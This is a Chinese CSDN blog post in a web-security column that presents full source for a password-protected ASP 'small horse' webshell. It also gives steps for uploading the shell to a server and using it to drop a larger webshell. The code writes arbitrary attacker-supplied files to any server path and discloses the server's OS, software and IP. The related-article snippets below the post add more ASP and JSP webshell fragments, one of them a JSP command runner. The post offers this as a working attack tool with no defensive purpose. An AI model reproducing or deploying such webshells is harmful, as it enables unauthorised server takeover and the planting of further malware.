小马

最新推荐文章于 2023-09-09 17:44:30 发布
最新推荐文章于 2023-09-09 17:44:30 发布
阅读量557 收藏 3
点赞数
分类专栏: web 安全 文章标签: 小马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28644765/article/details/82831326
版权

将代码写入txt 文档中编辑完成后将后缀改为asp上传到FTP中

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>小马</title>

<%
on error resume Next '忽略页面的错误'
  if request("pass")="longoatian" then '设置密码,如果POST过来的form的表单的“pass”属性的值为longaotian则执行下一行'
  session("pw")="go" '给session的属性“pw”赋值“go”'
  end if
if session("pw")<>"go" then '如果session中的“pw”属性值不等于“go”则显示一个登陆框'
  response.write "<center><br><from action='' method='post'>"
  response.write "<input name='pass' type='password' size='10'> <input type='submit' value='我要进去'></center>"
else '或者执行下面的代码'

set fso=server.createobject("scripting.filesystemobject")'创建一个FSO 的对象,用于操作磁盘、文件夹或文本文件,它是IIS 的内置组件'
path=request("path")'变量“path”(文件的保存路径)等于from表单POST过来的“path”属性的值'
if path<>"" then '如果变量“path”不为空,也就是提交了指定的路径'
  data=request("da")'变量“data”(保存的文件内容)等于from表单POST过来的“da”属性的值'
  set da=fso.createtextfile(path,true)'创建一个文件操作对象“da”,第一个参数表示写入的绝对路径,第二个参数true表示覆盖写入'
  da.write data'将“data”里面的数据写入到da对象中(也就是写入到指定的路径path中,以覆盖的形式)'
if err=0 then'err对象等于零时表示没有错误,写入成功'
  response.write "yes"'到页面上输出一个yes'
else
  response.write "no"'到页面上输出一个no'
end if
err.clear
end if
da.close
set da=nothing
set fos=nothing

'页面表单,显示服务器一些基本信息,以及显示一个提交的表单用于写入木马'
  response.write "<from action='' method=post>"
  response.write "<input type=text name=path><br />"
  response.write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
  response.write "<br /> 操作系统为:"&request.servervariables("os")
  response.write "<br /> WEB服务器版本为:"&request.servervariables("server_software")
  response.write "<br /> 服务器的ip为:"&request.servervariables("local_addr")&"<br>"
  response.write "<textarea name=da cols=50 rows=10 width=30></textarea><br><input type=submit value=save></from><font face='黑体' color='red'> longaotian </font>"
end if%>
</body></html>

完成后打开输入密码即可上传大马。

Break-attack
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
asp小马
06-25
asp小马asp小马asp小马asp小马asp小马asp小马asp小马
一个ASP小马
01-20
<%if request.QueryString(“action”)=”log” thena=Request.TotalBytes:if a Then b=”adodb.stream”:Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g
jsp一句话小马
weixin_42786460的博客
09-09 1118
jsp一句话小马
asp 一句话小马_一个ASP小马
weixin_39681058的博客
12-29 385
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=...
全能ASP小马
01-02
全能的ASP小马,有密码的保护,美化版 正的很好用
小马考试通ponyexam开源版是基于PHP开发的免费开源在线考试系统.zip
01-18
小马考试通ponyexam开源版是基于PHP开发的免费开源在线考试系统,能够快速搭建在线考试平台,系统支持多种题型:单选题、多选题、判断题、填空题、问答题等题型。支持在线考试,支持自动和人工两种方式批阅试卷。...
小马老师题目书.rar
04-04
2019年5月,小马老师发布了一本全新的题目书,配合考前必做138道题目,旨在帮助考生更好地准备这项考试。 小马老师的题目书涵盖了信息系统项目管理的各个方面,包括但不限于项目范围管理、时间管理、质量管理、成本...
2019上半年小马老师信息系统项目管理师(题目书)
03-14
《2019上半年小马老师信息系统项目管理师(题目书)》是针对软考中的信息系统项目管理师考试的一份重要参考资料。这份资料由知名讲师小马老师精心编纂,旨在帮助考生理解和掌握2019年上半年考试的重点与难点。通过对...
小马哥讲 Spring AOP 编程思想 - API 线索图.pdf
04-13
描述中,“小马哥讲 Spring AOP 编程思想”表明这是由一位专家小马哥讲解的内容,虽然没有提供更多关于小马哥的信息,但可以合理推断他应该是一位经验丰富的开发者或者技术讲师。 在内容部分列出的诸多术语中,可以...
【一等奖观察记录】中班 《小马过河》周五亲子故事汇.docx
04-14
【观察记录】中班《小马过河》周五亲子故事汇是全国幼儿教师专业风采大赛的一项参赛作品,旨在观察家长与幼儿在集体分享故事时的行为。观察发生在2015年3月至5月期间,主要关注中班的家长如何与孩子们进行有效的亲子...
web上传小马
10-07
构造上传页面,可以上传webshell大马进一步得到网站权限ASP
webshell -真实可用的jsp 马
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
ASP无<%%>小马一只
08-04
ASP无<%%>小马一只。防止了部分IIS防火墙拦截
分享一段jsp小马
qq_28429161的博客
07-20 3661
<% @ page language = "java" import = "java.util.*,java.io.*" pageEncoding = "UTF-8"%> < % !public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try { Process pro = Runtime.getRuntime().exec(c); BufferedReader
一只神奇的asp小马
一个码农的笔记
12-16 4857
<% dim file,content,path,task,paths,paths_str,nn,nnfilename,dpath,htmlpath,htmlpath_,htmlpath_str,addcontent,includefiles,noincludefiles,filetype,hanfiles,recontent,site_root,defaulthtml,defaultreplac
JSP
weixin_42437438的博客
04-10 233
关于Tomcat10 支持的是jakartaEE9,使用的是servlet5、jsp3和EL4 和javaEE8最大的区别是包名称,原来的javax.servlet全部变为jakarta.servlet JSP ####Servlet与JSP区别 简单的说,SUN首先发展出Servlet,其功能比较强劲,体系设计也很先进,只是,它输出HTML语句还是采用了老的CGI方式,是一句一句输出,所以,编写和修改HTML非常不方便。 后来SUN推出了类似于ASP的镶嵌型的JSP,把JSP标签镶嵌到HTML语句中,这样
C++输出字符型指针地址
给你一颗小瓜子的博客
10-21 2599
C++标准库中I/O类对<<操作符重载,因此在遇到字符型指针时会将其当作字符串名来处理,输出指针所指的字符串。因此,我们用static_cast强制类型转换把字符串指针转换成无类型指针即可输出指针地址 #include<iostream> using namespace std; int main() { char *p="abc"; cout << p << endl;//"abc" cout << *p &lt
史上真正最小的ASP小马
weixin_30423977的博客
12-13 366
经过狂精简. <%set z=server.createObject("Adodb.Stream") z.Open z.writetext request("x") z.SaveToFile server.mappath("o.asp"),2 set z=nothing%><form method=post><input type=submit><text...
asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用
热门推荐
weixin_39528525的博客
12-29 1万+
1.什么是webshellWeb 即 web服务也就是网站Shell 即人机交互界面,取得对服务器/电脑某种程度上的操作权限。Webshell即拿到网站服务器的权限(shell)比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。2.怎么才能get shell使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。常见的木马:asp一句话...
小马哥stm32f1源文件
最新发布
01-29
小马哥stm32f1源文件是指由小马哥团队开发的针对STMicroelectronics的STM32F1系列微控制器的源代码文件。 STM32F1系列微控制器是STMicroelectronics推出的一款32位ARM Cortex-M3内核的单片机产品系列,它具有高性能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值